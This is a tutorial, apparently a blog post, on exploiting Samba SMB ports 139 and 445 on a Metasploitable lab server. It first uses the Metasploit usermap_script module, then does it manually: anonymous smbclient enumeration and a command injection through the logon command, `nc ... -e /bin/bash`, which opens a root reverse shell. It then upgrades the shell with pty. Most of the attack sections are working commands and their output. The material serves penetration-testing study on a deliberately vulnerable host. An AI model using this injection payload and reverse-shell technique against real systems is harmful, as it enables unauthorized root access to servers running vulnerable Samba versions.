Samba is a software package that gives network administrators flexibility and freedom in terms of setup, configuration, and choice of systems and equipment.
Goal: Exploitation SMB(Server Message Block) port 139 and port 445 running on Metasploitable server.
Using msfconsole
The is quite easy to set up and easy to launch on Metasploit Framework. Let's run it on ParrotSec OS.
┌─[mrdev@mr-dev]─[~]
└──╼ $msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.1.9-dev ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: After running db_nmap, be sure to
check out the result of hosts and services
msf6 >
Once the framework starts, input the search command:
msf6 > search samba
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
1 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
2 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
3 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
4 post/linux/gather/enum_configs normal No Linux Gather Configurations
5 auxiliary/scanner/rsync/modules_list normal No List Rsync Modules
6 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
7 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
8 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
9 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
10 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
11 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
12 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
13 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
14 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
15 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow
16 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow
17 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
18 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
19 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
20 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
21 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
22 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
23 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
24 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
25 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
Interact with a module by name or index. For example info 25, use 25 or use exploit/windows/http/sambar6_search_results
msf6 >
On the 8th position, you can see an exploit that's rank is excellent. Now use this exploit and set the variables:
msf6 > use 8
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-fram
ework/wiki/Using-Metasploit
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 1xx.xx.xxx.xxx yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.56.3
RHOSTS => 192.168.56.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(multi/samba/usermap_script) >
If everything ok, run the exploit command:
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.3:56296) at 2022-01-16 04:36:53 +0530
id
uid=0(root) gid=0(root)
^Z
Background session 1? [y/N] y
msf6 exploit(multi/samba/usermap_script) >
Exploit works fine but in this way, you never gain any knowledge. The best way to practice hacking is to find your own way.
Exploit SMB without MSF Framework
This process is the best process for newbies. Follow the below steps to gain access to the server:
Step 1: Using smbclient
smbclient is quite similar to FTP. It is a useful tool to test connectivity of a windows share. It can be used to transfer files, or to look at share names.
Use the help command to verify if the smbclient application was installed or not:
┌─[mrdev@mr-dev]─[~]
└──╼ $smbclient --help
Usage: smbclient service <password>
-R, --name-resolve=NAME-RESOLVE-ORDER Use these name resolution services
only
-M, --message=HOST Send message
-I, --ip-address=IP Use this IP to connect to
-E, --stderr Write messages to stderr instead
of stdout
-L, --list=HOST Get a list of shares available on
a host
-m, --max-protocol=LEVEL Set the max protocol level
-T, --tar=<c|x>IXFvgbNan Command line tar
-D, --directory=DIR Start from directory
-c, --command=STRING Execute semicolon separated
commands
-b, --send-buffer=BYTES Changes the transmit/send buffer
-t, --timeout=SECONDS Changes the per-operation timeout
-p, --port=PORT Port to connect to
-g, --grepable Produce grepable output
-q, --quiet Suppress help message
-B, --browse Browse SMB servers using DNS
Help options:
-?, --help Show this help message
--usage Display brief usage message
Common samba options:
-d, --debuglevel=DEBUGLEVEL Set debug level
-s, --configfile=CONFIGFILE Use alternate configuration file
-l, --log-basename=LOGFILEBASE Base name for log files
-V, --version Print version
--option=name=value Set smb.conf option from command
line
Connection options:
-O, --socket-options=SOCKETOPTIONS socket options to use
-n, --netbiosname=NETBIOSNAME Primary netbios name
-W, --workgroup=WORKGROUP Set the workgroup name
-i, --scope=SCOPE Use this Netbios scope
Authentication options:
-U, --user=USERNAME Set the network username
-N, --no-pass Don't ask for a password
-k, --kerberos Use kerberos (active directory)
authentication
-A, --authentication-file=FILE Get the credentials from a file
-S, --signing=on|off|required Set the client signing state
-P, --machine-pass Use stored machine account password
-e, --encrypt Encrypt SMB transport
-C, --use-ccache Use the winbind ccache for
authentication
--pw-nt-hash The supplied password is the NT
hash
┌─[mrdev@mr-dev]─[~]
└──╼ $
Use SMB client and check for anonymous access:
┌─[mrdev@mr-dev]─[~]
└──╼ $smbclient -L //192.168.56.3/
Enter WORKGROUP\mrdev's password:
Note: If you found a protocol negotiation error then Click here to find out your answer.
SMB Client - STATUS_CONNECTION_DISCONNECTED
This article delves into the SMB (Server Message Block) protocol and explores the STATUS_CONNECTION_DISCONNECTED error. Understanding SMB protocols and associated error codes is crucial for network administrators and security professionals.
If smbclient prompts you to input a password just keep it blank and hit enter:
┌─[mrdev@mr-dev]─[~]
└──╼ $smbclient -L //192.168.56.3/
Enter WORKGROUP\mrdev's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE
┌─[mrdev@mr-dev]─[~]
└──╼ $
Step 2: Attack using Netcat
Since we know that the "tmp" directory is present, we are going to try to make a reverse connection:
Sharename Type Comment
--------- ---- -------
tmp Disk oh noes!
Let's open a new terminal and run Netcat for accepting a reverse connection:
┌─[mrdev@mr-dev]─[~]
└──╼ $nc -lvp 4444
listening on [any] 4444 ...
Let's take access to the tmp directory on the Samba server using the below command:
┌─[mrdev@mr-dev]─[~]
└──╼ $smbclient //192.168.56.3/tmp
Enter WORKGROUP\mrdev's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>
Type the help command to find out if the login command is available or not:
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \>
Since the logon command is there we can make a reverse connection using the below command:
smb: \> logon "/=`nc 192.168.56.1 4444 -e /bin/bash`"
Password:
After successful command injection, you will get a reverse shell in NetCat:
┌─[mrdev@mr-dev]─[~]
└──╼ $nc -lvp 4444
listening on [any] 4444 ...
192.168.56.3: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.3] 42581
id #To verify if shell found or not
uid=0(root) gid=0(root)
Step 3: Terminal View
Type the following command to take the terminal view from a shell:
python -c "import pty;pty.spawn('bin/bash');"
root@metasploitable:/# ls
ls
bin dev initrd lost+found nohup.out root sys var
boot etc initrd.img media opt sbin tmp vmlinuz
cdrom home lib mnt proc srv usr
root@metasploitable:/#
I think you got an idea of how to perform a samba attack.
